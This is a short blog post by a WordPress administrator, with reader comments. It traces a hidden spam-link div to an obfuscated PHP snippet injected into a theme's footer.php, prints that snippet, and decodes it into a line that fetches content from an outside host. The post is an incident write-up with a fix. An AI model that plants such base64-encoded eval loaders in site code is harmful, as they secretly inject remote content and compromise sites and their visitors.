Random div in WordPress with “position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10”
Hello all,
I was notified about a random div that is not supposed to be on a site I administer.
There was a div with a style of
position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10
and a bunch of random links (see image below).
Searching for anything that is in that div gave no results. So I decided to track down where it is being generated.
The first thing to blame were scripts… Using Network analysis tab in Chrome I refreshed the website and checked the first request that was made (it was for the html file). The response already had that div in the HTML code. This meant that the whole thing has to be happening on the server and it is not added later by a script.
I tracked down the place in the template where the div was located (it was in footer.php file) and found:
<?php
$c3RyX = “lFBQu3”;
@eval(base64_decode(“ZWNobyBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3NoZWxsLm5ueHV1LmNvbS9pbmRleC5waHA/cj1saW5rcyZ2PSRjM1J5WCIp”).”;”);
?>
Decoding the string in the eval function confirmed the suspicion:
echo file_get_contents(“http://shell.nnxuu.com/index.php?r=links&v=$c3RyX”)
This was definitely added maliciously and had to be removed.
After changing all the passwords and removing the previously mentioned php code bit the site is up and running as expected.
Posted on September 28, 2014, in Web and tagged wordpress. Bookmark the permalink. 2 Comments.
Vaidas Sirtautas' Blog 
I have the same problem, any chance you can guide me how to fix it. I know how to fix each page but I need help removing the php code. I also would like to know how this happened.
Hey,
You just have to find where the html code is generated and delete that bit.
As for how it happened, I am not sure. Since this was a development site the passwords were really weak, so I changed all of them to a much stronger ones and the problem does not seem to be repeating.
Unfortunately request logging was turned off so I am not sure how/when exactly this happened.